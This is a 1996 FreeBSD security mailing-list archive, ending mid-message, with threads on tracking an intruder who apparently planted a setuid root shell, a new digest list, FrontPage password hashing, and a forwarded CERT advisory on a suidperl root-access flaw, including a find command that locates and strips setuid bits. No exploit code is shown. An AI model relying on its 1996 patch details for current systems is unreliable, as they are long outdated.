17:20:48 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA12631 for security-outgoing; Tue, 25 Jun 1996 17:20:48 -0700 (PDT) Received: (from jmb@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA12620; Tue, 25 Jun 1996 17:20:45 -0700 (PDT) From: "Jonathan M. Bresler" Message-Id: <199606260020.RAA12620@freefall.freebsd.org> Subject: Re: I need help on this one - please help me track this guy down! To: jbhunt@mercury.gaianet.net (jbhunt) Date: Tue, 25 Jun 1996 17:20:45 -0700 (PDT) Cc: mark@grumble.grondar.za, msmith@atrad.adelaide.edu.au, vince@mercury.gaianet.net, mark@grondar.za, security@FreeBSD.ORG, chad@mercury.gaianet.net In-Reply-To: from "jbhunt" at Jun 25, 96 12:52:24 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk jbhunt wrote: > > Yes I read the security reports as I said it hasn't been reporting any > unusual suid programs. No, he won't tell me I already asked of course. As > vince stated we are remote admin's we both have to su to root so the only > person on the actual console is chad. As for running a script I know for could be a new one or could be a moldy old one. you have to su to root on a remote computer. how do you get access to the remote macine? telnet? serial line? encrypted? or in the clear? > a fact that I wasn't running anything at the time. I know this guys > methods for the most part so I am almost sure he has some new exploit. He > also claims to have one that EVERY linux box is vulnerable to of course > he won't tell me or give it to me. jmb -- Jonathan M. Bresler FreeBSD Postmaster jmb@FreeBSD.ORG FreeBSD--4.4BSD Unix for PC clones, source included. http://www.freebsd.org/ PGP 2.6.2 Fingerprint: 31 57 41 56 06 C1 40 13 C5 1C E3 E5 DC 62 0E FB From owner-freebsd-security Tue Jun 25 17:38:24 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA14510 for security-outgoing; Tue, 25 Jun 1996 17:38:24 -0700 (PDT) Received: (from jmb@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA14485; Tue, 25 Jun 1996 17:38:21 -0700 (PDT) From: "Jonathan M. Bresler" Message-Id: <199606260038.RAA14485@freefall.freebsd.org> Subject: FreeBSD-security-digest NEW mailing list To: freebsd-announce Date: Tue, 25 Jun 1996 17:38:20 -0700 (PDT) Cc: freebsd-security X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk freebsd-security-digest is a new mailing list available from FreeBSD.org to subscribe send mail to majordomo@freebsd.org containing the single line: "subscribe freebsd-security-digest" this digest will contain all the messages mailed to freebsd-security. the messages will be collected together and sent out as a single mailing on a semi-periodic basis (size and time are the criteria). issues of the digest will be archived at FreeBSD.org. the archives are available thru majordomo. send mail to majordomo@freebsd.org containing the single line: "index freebsd-security-digest" to get a list of archived issues. individual issues can be retrieved by volume and issue number using majordomo. send mail to majordomo@freebsd.org containing the single line: "get freebsd-security-digest " FREEBSD-SECURITY-DIGEST Security matters This is the digest version of the freebsd-security mailing list. The digest consists of all messages sent to freebsd-security bundled together and mailed out as a single message. information on freebsd-security: FreeBSD computer security issues (DES, Kerberos, known security holes and fixes, etc). jmb -- Jonathan M. Bresler FreeBSD Postmaster jmb@FreeBSD.ORG FreeBSD--4.4BSD Unix for PC clones, source included. http://www.freebsd.org/ PGP 2.6.2 Fingerprint: 31 57 41 56 06 C1 40 13 C5 1C E3 E5 DC 62 0E FB From owner-freebsd-security Tue Jun 25 19:49:50 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA27886 for security-outgoing; Tue, 25 Jun 1996 19:49:50 -0700 (PDT) Received: from unix.stylo.it (unix.stylo.it [193.76.98.2]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id TAA27856; Tue, 25 Jun 1996 19:49:36 -0700 (PDT) Received: from styloserver.stylo.it (trust.stylo.it [194.21.207.253]) by unix.stylo.it (8.7.5/8.6.9) with SMTP id EAA04245; Wed, 26 Jun 1996 04:49:18 +0200 (MET DST) Received: by styloserver.stylo.it with Microsoft Exchange (IMC 4.12.736) id <01BB631A.F0990400@styloserver.stylo.it>; Wed, 26 Jun 1996 04:50:03 +0200 Message-ID: From: Angelo Turetta To: "'freebsd-security@freebsd.org'" , "'freebsd-questions'" Subject: Anybody using FrontPage server extensions for BSDI ? (DES-related) Date: Wed, 26 Jun 1996 04:49:58 +0200 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.12.736 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="---- =_NextPart_000_01BB631A.F0A02FF0" Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. Contact your mail administrator for information about upgrading your reader to a version that supports MIME. ------ =_NextPart_000_01BB631A.F0A02FF0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit FrontPage 1.1 server extension seems to run on 960501-SNAP, but it encrypts passwords with something different than the standard MD5. I've got the .za DES package, and I think I've managed to install it correctly, but FrontPage authentication is still failing. How can I check whether my crypt shared libraries are really doing DES ? What other encryption might they be using (after all, if DES was not in my system, how the hell was FrontPage able to save a DES-encrypted password for the administrator during setup ??? :-) Is anybody using FrontPage Extensions on FreeBSD ? I'm not on these lists, please Cc: replies to me. Thanks Angelo. ----------------------------------------------------------------- Angelo Turetta mailto:aturetta@stylo.it Stylo Multimedia - Bologna - Italy http://www.stylo.it/ ------ =_NextPart_000_01BB631A.F0A02FF0-- From owner-freebsd-security Tue Jun 25 20:15:20 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA29141 for security-outgoing; Tue, 25 Jun 1996 20:15:20 -0700 (PDT) Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA29117; Tue, 25 Jun 1996 20:15:11 -0700 (PDT) Received: from msmith@localhost by genesis.atrad.adelaide.edu.au (8.6.12/8.6.9) id MAA02789; Wed, 26 Jun 1996 12:31:17 +0930 From: Michael Smith Message-Id: <199606260301.MAA02789@genesis.atrad.adelaide.edu.au> Subject: Re: Anybody using FrontPage server extensions for BSDI ? (DES-related) To: ATuretta@stylo.it (Angelo Turetta) Date: Wed, 26 Jun 1996 12:31:17 +0930 (CST) Cc: freebsd-security@FreeBSD.org, freebsd-questions@FreeBSD.org In-Reply-To: from "Angelo Turetta" at Jun 26, 96 04:49:58 am MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Angelo Turetta stands accused of saying: > > FrontPage 1.1 server extension seems to run on 960501-SNAP, but it encrypts > passwords with something different than the standard MD5. > > I've got the .za DES package, and I think I've managed to install it > correctly, but FrontPage authentication is still failing. Can't help with that, sorry. > How can I check whether my crypt shared libraries are really doing DES ? > What other encryption might they be using (after all, if DES was not in my > system, how the hell was FrontPage able to save a DES-encrypted password for > the administrator during setup ??? :-) It's almost certainly statically linked. > Angelo Turetta mailto:aturetta@stylo.it -- ]] Mike Smith, Software Engineer msmith@atrad.adelaide.edu.au [[ ]] Genesis Software genesis@atrad.adelaide.edu.au [[ ]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[ ]] realtime instrument control (ph/fax) +61-8-267-3039 [[ ]] Collector of old Unix hardware. "Where are your PEZ?" The Tick [[ From owner-freebsd-security Tue Jun 25 22:24:37 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id WAA06572 for security-outgoing; Tue, 25 Jun 1996 22:24:37 -0700 (PDT) Received: from MindBender.HeadCandy.com (root@[199.238.225.168]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id WAA06512; Tue, 25 Jun 1996 22:21:54 -0700 (PDT) Received: from localhost.HeadCandy.com (michaelv@localhost.HeadCandy.com [127.0.0.1]) by MindBender.HeadCandy.com (8.7.5/8.7.3) with SMTP id WAA00500; Tue, 25 Jun 1996 22:11:17 -0700 (PDT) Message-Id: <199606260511.WAA00500@MindBender.HeadCandy.com> X-Authentication-Warning: MindBender.HeadCandy.com: Host michaelv@localhost.HeadCandy.com [127.0.0.1] didn't use HELO protocol To: -Vince- cc: "Eric J. Schwertfeger" , Mark Murray , hackers@freebsd.org, security@freebsd.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of Tue, 25 Jun 96 13:03:06 -0700. Date: Tue, 25 Jun 1996 22:11:14 -0700 From: "Michael L. VanLoon -- HeadCandy.com" Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >On Tue, 25 Jun 1996, Eric J. Schwertfeger wrote: >> On Tue, 25 Jun 1996, -Vince- wrote: >> > Yeah, you have a point but jbhunt was watching the user as he >> > hacked root since he brought the file from his own machine.... so that >> > wasn't something the admin was tricked into doing.. >> Then the important question is, how did he move the file so that it >> retained the setuid bit? We're already pretty sure that the program is >> only /bin/sh with the setuid bit turned on. So either he found a way to >> move the file with the bit turned on, or he found a way to turn it on, >> which reqires root access. > It was a remote login so he had to transfer it over somehow... Well, *if* that's true, it still wouldn't be setuid root just from the transfer. He'd *still* have to get root some other way to make this binary setuid root. But if he's going to do that, why bother copying a binary over the network -- it would just be easier to just snag a copy of your own /bin/sh and mark it setuid root. ----------------------------------------------------------------------------- Michael L. VanLoon michaelv@HeadCandy.com --< Free your mind and your machine -- NetBSD free un*x >-- NetBSD working ports: 386+PC, Mac 68k, Amiga, Atari 68k, HP300, Sun3, Sun4/4c/4m, DEC MIPS, DEC Alpha, PC532, VAX, MVME68k, arm32... NetBSD ports in progress: PICA, others... Roll your own Internet access -- Seattle People's Internet cooperative. If you're in the Seattle area, ask me how. ----------------------------------------------------------------------------- From owner-freebsd-security Tue Jun 25 23:21:56 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA11108 for security-outgoing; Tue, 25 Jun 1996 23:21:56 -0700 (PDT) Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id XAA11101 for ; Tue, 25 Jun 1996 23:21:51 -0700 (PDT) Received: by gvr.win.tue.nl (8.6.12/1.53) id IAA22374; Wed, 26 Jun 1996 08:21:36 +0200 From: guido@gvr.win.tue.nl (Guido van Rooij) Message-Id: <199606260621.IAA22374@gvr.win.tue.nl> Subject: Re: List of freebsd security advisories? To: lithium@cia-g.com (Stephen Fisher) Date: Wed, 26 Jun 1996 08:21:35 +0200 (MET DST) Cc: freebsd-security@freebsd.org In-Reply-To: from Stephen Fisher at "Jun 25, 96 03:31:07 pm" X-Mailer: ELM [version 2.4ME+ PL17 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Stephen Fisher wrote: > > Hello, > > Anyone have an archive of the FreeBSD security advisories? I'd like to > be able to fix the problems on newly installed 2.1R systems. > ftp://freefall.cdrom.com:/pub/CERT -Guido From owner-freebsd-security Wed Jun 26 03:57:27 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA00754 for security-outgoing; Wed, 26 Jun 1996 03:57:27 -0700 (PDT) Received: from bdd.net ([207.61.78.33]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id DAA00749; Wed, 26 Jun 1996 03:57:23 -0700 (PDT) Received: from localhost (james@localhost) by bdd.net (8.7.5/8.7.3) with SMTP id GAA16888; Wed, 26 Jun 1996 06:57:21 -0400 (EDT) Date: Wed, 26 Jun 1996 06:57:19 -0400 (EDT) From: James FitzGibbon To: "Jonathan M. Bresler" cc: freebsd-announce@freefall.freebsd.org, freebsd-security@freefall.freebsd.org Subject: Re: FreeBSD-security-digest NEW mailing list In-Reply-To: <199606260038.RAA14485@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Jonathan M. Bresler wrote: > freebsd-security-digest is a new mailing list available from FreeBSD.org > > to subscribe send mail to majordomo@freebsd.org containing the single line: > "subscribe freebsd-security-digest" > > this digest will contain all the messages mailed to freebsd-security. > the messages will be collected together and sent out as a single mailing > on a semi-periodic basis (size and time are the criteria). Great idea to cut down on the traffic around security discussions, but when an advisory comes out, time is of the essence. The creation of a digested security discussion list would seem to call for the creation of a security "advisory" list that only select people (security-officer, etc.) could post to. Using this method, one could read the general discussion surrounding security issues without compromising the speed with which they get important advisories. -- j. ---------------------------------------------------------------------------- | James FitzGibbon james@nexis.net | | Integrator, The Nexis Group Voice/Fax : 416 410-0100 | ---------------------------------------------------------------------------- From owner-freebsd-security Wed Jun 26 04:33:16 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id EAA03224 for security-outgoing; Wed, 26 Jun 1996 04:33:16 -0700 (PDT) Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id EAA03217; Wed, 26 Jun 1996 04:33:11 -0700 (PDT) Received: by gvr.win.tue.nl (8.6.12/1.53) id NAA22978; Wed, 26 Jun 1996 13:32:55 +0200 From: guido@gvr.win.tue.nl (Guido van Rooij) Message-Id: <199606261132.NAA22978@gvr.win.tue.nl> Subject: Re: FreeBSD-security-digest NEW mailing list To: james@nexis.net (James FitzGibbon) Date: Wed, 26 Jun 1996 13:32:55 +0200 (MET DST) Cc: jmb@freefall.freebsd.org, freebsd-announce@freefall.freebsd.org, freebsd-security@freefall.freebsd.org In-Reply-To: from James FitzGibbon at "Jun 26, 96 06:57:19 am" X-Mailer: ELM [version 2.4ME+ PL17 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk James FitzGibbon wrote: > On Tue, 25 Jun 1996, Jonathan M. Bresler wrote: > > > freebsd-security-digest is a new mailing list available from FreeBSD.org > > > > to subscribe send mail to majordomo@freebsd.org containing the single line: > > "subscribe freebsd-security-digest" > > > > this digest will contain all the messages mailed to freebsd-security. > > the messages will be collected together and sent out as a single mailing > > on a semi-periodic basis (size and time are the criteria). > > Great idea to cut down on the traffic around security discussions, but > when an advisory comes out, time is of the essence. The creation of a > digested security discussion list would seem to call for the creation of a > security "advisory" list that only select people (security-officer, etc.) > could post to. > > Using this method, one could read the general discussion surrounding > security issues without compromising the speed with which they get > important advisories. Read an advisory and subscribe to the actual mailing list. -Guido From owner-freebsd-security Wed Jun 26 11:41:08 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA26621 for security-outgoing; Wed, 26 Jun 1996 11:41:08 -0700 (PDT) Received: from post.io.org (post.io.org [198.133.36.6]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id LAA26612 for ; Wed, 26 Jun 1996 11:40:55 -0700 (PDT) Received: from zap.io.org (taob@zap.io.org [198.133.36.81]) by post.io.org (8.7.5/8.7.3) with SMTP id OAA04419 for ; Wed, 26 Jun 1996 14:37:19 -0400 (EDT) Date: Wed, 26 Jun 1996 14:38:13 -0400 (EDT) From: Brian Tao To: FREEBSD-SECURITY-L Subject: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I believe this applies to perl4 as shipped with all versions of FreeBSD, as well as the perl5 packages/ports. Does anyone know what the actual vulnerability is? -- Brian Tao (BT300, taob@io.org, taob@ican.net) Systems and Network Administrator, Internet Canada Corp. "Though this be madness, yet there is method in't" ---------- Forwarded message ---------- Date: Wed, 26 Jun 1996 11:41:55 -0400 From: CERT Advisory Reply-To: cert-advisory-request@cert.org To: cert-advisory@cert.org Subject: CERT Advisory CA-96.12 - Vulnerability in suidperl -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= CERT(sm) Advisory CA-96.12 June 26, 1996 Topic: Vulnerability in suidperl - ----------------------------------------------------------------------------- The CERT Coordination Center has received reports of a vulnerability in systems that contain the suidperl program and that support saved set-user-ID and saved set-group-ID. By exploiting this vulnerability, anyone with access to an account on such a system may gain root access. Saved set-user-IDs and set-group-IDs are sometimes referred to as POSIX saved IDs. suidperl is also known as sperl followed by a version number, as in sperl5.002. Perl versions 4 and 5 can be compiled and installed in such a way that they will be vulnerable on some systems. If you have installed the suidperl or sperl programs on a system that supports saved set-user-ID and set-group-ID, you may be at risk. The CERT Coordination Center recommends that you first disable the suidperl and sperl programs (Section III.A). If you need the functionality, we further recommend that you either apply a patch for this problem or install Perl version 5.003 (Section III.B). If neither a patch nor a new version are viable alternatives, we recommend installing the wrapper written by Larry Wall as a workaround for this problem (Section III.C). As we receive additional information relating to this advisory, we will place it in ftp://info.cert.org/pub/cert_advisories/CA-96.12.README We encourage you to check our README files regularly for updates on advisories that relate to your site. - ----------------------------------------------------------------------------- I. Description On some systems, setuid and setgid scripts (scripts written in the C shell, Bourne shell, or Perl, for example, with the set user or group ID permissions enabled) are insecure due to a race condition in the kernel. For those systems, Perl versions 4 and 5 attempt to work around this vulnerability with a special program named suidperl, also known as sperl. Even on systems that do provide a secure mechanism for setuid and setgid scripts, suidperl may also be installed--although it is not needed. suidperl attempts to emulate the set-user-ID and set-group-ID features of the kernel. Depending on whether the script is set-user-ID, set-group-ID, or both, suidperl achieves this emulation by first changing its effective user or group ID to that of the original Perl script. suidperl then reads and executes the script as that effective user or group. To do these user and group ID changes correctly, suidperl must be installed as set-user-ID root. On systems that support saved set-user-ID and set-group-ID, suidperl does not properly relinquish its root privileges when changing its effective user and group IDs. II. Impact On a system that has the suidperl or sperl program installed and that supports saved set-user-ID and saved set-group-ID, anyone with access to an account on the system can gain root access. III. Solution The command in Section A helps you determine if your system is vulnerable and, if it is, optionally disables the suidperl and sperl programs that it locates. After you have run this command on all of your systems, your system will no longer be vulnerable. If you find that your system is vulnerable, then you need to replace the suidperl and sperl programs with new versions. Section B describes how to do that. Finally, Section C identifies a wrapper that can be used in place of the suidperl program. A. How to determine if your system is vulnerable To determine if a system is vulnerable to this problem and to disable the programs that are believed to be vulnerable, use the following find command or a variant. Consult your local system documentation to determine how to tailor the find program on your system. You will need to run the find command on each system you maintain because the command examines files on the local disk only. Substitute the names of your local file systems for FILE_SYSTEM_NAMES in the example. Example local file system names are /, /usr, and /var. You must do this as root. Note that this is one long command, though we have separated it onto three lines using back-slashes. find FILE_SYSTEM_NAMES -xdev -type f -user root \ \( -name 'sperl[0-9].[0-9][0-9][0-9]' -o -name \ 'suidperl' \) -perm -04000 -print -ok chmod ug-s '{}' \; This command will find all files on a system that are - only in the file system you name (FILE_SYSTEM_NAMES -xdev) - regular files (-type f) - owned by root (-user root) - named appropriately (-name 'sperl[0-9].[0-9][0-9][0-9]' -o -name 'suidperl') - setuid root (-perm -04000) Once found, those files will - have their names printed (-print) - have their modes changed, but only if you type `y' in response to the prompt (-ok chown ug-s '{}' \;) B. Obtain and install the appropriate patch according to the instructions included with the patch. Vendor patches -------------- You may be vulnerable if your vendor supports saved set-user-ID and set-group-ID and ships suidperl or sperl. You need to get a patched version from your vendor. Appendix A contains information provided by vendors as of the date of this advisory. When we receive updated information, we will put it in CA-96.12.README. Until you can install a patch, we recommend disabling suidperl. The find command above will help you do that. If you need suidperl or sperl, an alternative is to install the wrapper described in Section C. Source code patches ------------------- If you have installed Perl from source code, you should install source code patches. Patches are available from the CPAN (Comprehensive Perl Archive Network) archives. Patch for Perl Version 4: File src/fixsuid4-0.pat MD5 Checksum af3e3c40bbaafce134714f1381722496 Patch for Perl Version 5: File src/fixsuid5-0.pat MD5 Checksum 135c96ee400fd37a38a7ef37edd489e9 In addition, Perl version 5.003 contains this patch, so installing it on your system also addresses this vulnerability. Perl 5.003 is available from the CPAN archives. Here are the specifics: File src/5.0/perl5.003.tar.gz MD5 Checksum b1bb23995cd25e5b750585bfede0e8a5 The CPAN archives can be found at the following locations: CPAN master site ftp://ftp.funet.fi/pub/languages/perl/CPAN/ Africa ftp://ftp.is.co.za/programming/perl/CPAN/ Asia ftp://dongpo.math.ncu.edu.tw/perl/CPAN/ ftp://ftp.lab.kdd.co.jp/lang/perl/CPAN/ Australasia ftp://coombs.anu.edu.au/pub/perl/ ftp://ftp.mame.mu.oz.au/pub/perl/CPAN/ ftp://ftp.tekotago.ac.nz/pub/perl/CPAN/ Europe ftp://ftp.arnes.si/software/perl/CPAN/ ftp://ftp.ci.uminho.pt/pub/lang/perl/ ftp://ftp.cs.ruu.nl/pub/PERL/CPAN/ ftp://ftp.demon.co.uk/pub/mirrors/perl/CPAN/ ftp://ftp.funet.fi/pub/languages/perl/CPAN/ ftp://ftp.ibp.fr/pub/perl/CPAN/ ftp://ftp.leo.org/pub/comp/programming/languages/perl/CPAN/ ftp://ftp.pasteur.fr/pub/computing/unix/perl/CPAN/ ftp://ftp.rz.ruhr-uni-bochum.de/pub/programming/languages/perl/CPAN/ ftp://ftp.sunet.se/pub/lang/perl/CPAN/ ftp://ftp.switch.ch/mirror/CPAN/ ftp://unix.hensa.ac.uk/mirrors/perl-CPAN/ North America ftp://ftp.cis.ufl.edu/pub/perl/CPAN/ ftp://ftp.delphi.com/pub/mirrors/packages/perl/CPAN/ ftp://ftp.sedl.org/pub/mirrors/CPAN/ ftp://ftp.sterling.com/programming/languages/perl/ ftp://ftp.uoknor.edu/mirrors/CPAN/ ftp://uiarchive.cso.uiuc.edu/pub/lang/perl/CPAN/ C. If you need setuid or setgid Perl scripts and are unable to apply the source code patches listed in Section B, we suggest that you retrieve Larry Wall's fixsperl script noted below. fixsperl is a script that replaces the suidperl and sperl programs with a wrapper that eliminates the vulnerability. The script is available from the CPAN archives as File src/fixsperl-0 MD5 Checksum f13900d122a904a8453a0af4c1bdddc6 Note that this script should be run one time, naming every suidperl or sperl file on your system. If you add another version of suidperl or sperl to your system, then you must run fixsperl on those newly installed versions. - --------------------------------------------------------------------------- The CERT Coordination Center staff thanks Paul Traina, Larry Wall, Eric Allman, Tom Christiansen, and AUSCERT for their support in the development of this advisory. - --------------------------------------------------------------------------- If you believe that your system has been compromised, contact the CERT Coordination Center or your representative in the Forum of Incident Response and Security Teams (FIRST). We strongly urge you to encrypt any sensitive information you send by email. The CERT Coordination Center can support a shared DES key and PGP. Contact the CERT staff for more information. Location of CERT PGP key: ftp://info.cert.org/pub/CERT_PGP.key CERT Contact Information - ------------------------ Email cert@cert.org Phone +1 412-268-7090 (24-hour hotline) CERT personnel answer 8:30-5:00 p.m. EST (GMT-5)/EDT(GMT-4), and are on call for emergencies during other hours. Fax +1 412-268-6989 Postal address CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 USA CERT publications, information about FIRST representatives, and other security-related information are available for anonymous FTP from http://www.cert.org/ ftp://info.cert.org/pub/ CERT advisories and bulletins are also posted on the USENET newsgroup comp.security.announce To be added to our mailing list for CERT advisories and bulletins, send your email address to cert-advisory-request@cert.org Copyright 1996 Carnegie Mellon University This material may be reproduced and distributed without permission provided it is used for non-commercial purposes and the copyright statement is included. CERT is a service mark of Carnegie Mellon University. ......................................................................... Appendix A: Vendor Information Current as of June 26, 1996 See CA-96.12.README for updated information. Below is information we have received from vendors concerning the vulnerability described in this advisory. If you do not see your vendor's name, please contact the vendor directly for information. Apple Computer, Inc. ==================== A/UX 3.1.1 and earlier support saved set-{user,group}-ids. A/UX 3.1.1 and earlier do not have Perl as part of the standard product. Data General Corporation ======================== Data General does support saved set-user-IDs and set-group-IDs on DG/UX. Data General does not ship suidperl or sperl* with DG/UX. Hewlett-Packard Company ======================= HP/UX versions 8.X, 9.X, and 10.X all support saved set-user-id. None of HP/UX versions 8.X, 9.X, and 10.X have Perl as part of the standard product. IBM Corporation =============== AIX versions 3.2.5 and 4.X support saved set-user-id. AIX versions 3.2.5 and 4.X do not have Perl as part of the standard product. However, the SP2's PSSP software does contain suidperl, but the program is not installed with the setuid bit set. Linux ===== Linux 1.2 and 2.0 support saved set-user-id. Most distributions of Linux provide suidperl and sperl. The fixsperl script works on linux, and it is recommended that this fix be applied until a new Perl release is made. Open Software Foundation ======================== OSF/1 1.3 or later support saved set-user-id OSF/1 1.3 or later does not have Perl as part of the standard product. Sony Corporation ================ NEWS-OS 4.X does not support saved set-user-id and therefore any version of Perl on that system is not vulnerable. NEWS-OS 6.X does support saved set-user-id. X.org ===== None of X.org's development systems are vulnerable to the saved set-user-IDs and set-group-IDs problems, and suidperl is not shipped with either of our products. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMdE8tnVP+x0t4w7BAQF2eQQAlpH/zOBMFK3/TQ+TAbfAkkULJORsvPTs Hv2aJtInooObGNlT8NThg+7DBOUTcNQ7allPtNRzDE9xIDsn/ZGQZSUMtuSiVqI5 F9vgXZgDFNMknRW35ae6E9zJ3R/FJGIVxQyA6BB2YhbyvnaMrzKqE0nGDy1GZsPl mhGAXh3CZYw= =o+Jl -----END PGP SIGNATURE----- From owner-freebsd-security Wed Jun 26 12:14:56 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id MAA28903 for security-outgoing; Wed, 26 Jun 1996 12:14:56 -0700 (PDT) Received: from rocky.mt.sri.com (rocky.sri.MT.net [204.182.243.10]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id MAA28897 for ; Wed, 26 Jun 1996 12:14:52 -0700 (PDT) Received: (from nate@localhost) by rocky.mt.sri.com (8.7.5/8.7.3) id NAA05459; Wed, 26 Jun 1996 13:14:32 -0600 (MDT) Date: Wed, 26 Jun 1996 13:14:32 -0600 (MDT) Message-Id: <199606261914.NAA05459@rocky.mt.sri.com> From: Nate Williams To: Brian Tao Cc: FREEBSD-SECURITY-L Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd) In-Reply-To: References: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > I believe this applies to perl4 as shipped with all versions of > FreeBSD, as well as the perl5 packages/ports. Does anyone know what > the actual vulnerability is? I don't, but thanks for bringing this up. I was planning on bringing this in but I forgot. I just applied the suggested change to the version of perl in -stable and -current, so it'll be in 2.1.5. Nate From owner-freebsd-security Wed Jun 26 13:05:42 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA04975 for security-outgoing; Wed, 26 Jun 1996 13:05:42 -0700 (PDT) Received: from ns2.harborcom.net (root@ns2.harborcom.net [206.158.4.4]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA04963 for ; Wed, 26 Jun 1996 13:05:34 -0700 (PDT) Received: from swoosh.dunn.org (swoosh.dunn.org [206.158.7.243]) by ns2.harborcom.net (8.7.4/8.6.12) with SMTP id QAA23146; Wed, 26 Jun 1996 16:05:16 -0400 (EDT) Message-Id: <199606262005.QAA23146@ns2.harborcom.net> Comments: Authenticated sender is From: "Bradley Dunn" Organization: Harbor Communications To: Nate Williams Date: Wed, 26 Jun 1996 16:00:42 -0500 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd Reply-to: dunn@harborcom.net CC: FREEBSD-SECURITY-L Priority: normal X-mailer: Pegasus Mail for Win32 (v2.31) Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On 26 Jun 96 at 13:14, Nate Williams wrote: > > I believe this applies to perl4 as shipped with all versions of > > FreeBSD, as well as the perl5 packages/ports. Does anyone know what > > the actual vulnerability is? > > I don't, but thanks for bringing this up. I was planning on bringing > this in but I forgot. I just applied the suggested change to the > version of perl in -stable and -current, so it'll be in 2.1.5. The port should be upgraded to 5.003 as well. Bradley Dunn From owner-freebsd-security Wed Jun 26 13:07:35 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA05097 for security-outgoing; Wed, 26 Jun 1996 13:07:35 -0700 (PDT) Received: from rocky.mt.sri.com (rocky.sri.MT.net [204.182.243.10]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA05084 for ; Wed, 26 Jun 1996 13:07:31 -0700 (PDT) Received: (from nate@localhost) by rocky.mt.sri.com (8.7.5/8.7.3) id OAA05767; Wed, 26 Jun 1996 14:06:46 -0600 (MDT) Date: Wed, 26 Jun 1996 14:06:46 -0600 (MDT) Message-Id: <199606262006.OAA05767@rocky.mt.sri.com> From: Nate Williams To: dunn@harborcom.net Cc: Nate Williams , FREEBSD-SECURITY-L Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd In-Reply-To: <199606262005.QAA23146@ns2.harborcom.net> References: <199606262005.QAA23146@ns2.harborcom.net> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Bradley Dunn writes: > On 26 Jun 96 at 13:14, Nate Williams wrote: > > > > I believe this applies to perl4 as shipped with all versions of > > > FreeBSD, as well as the perl5 packages/ports. Does anyone know what > > > the actual vulnerability is? > > > > I don't, but thanks for bringing this up. I was planning on bringing > > this in but I forgot. I just applied the suggested change to the > > version of perl in -stable and -current, so it'll be in 2.1.5. > > The port should be upgraded to 5.003 as well. I'm not a ports dude. Send email to 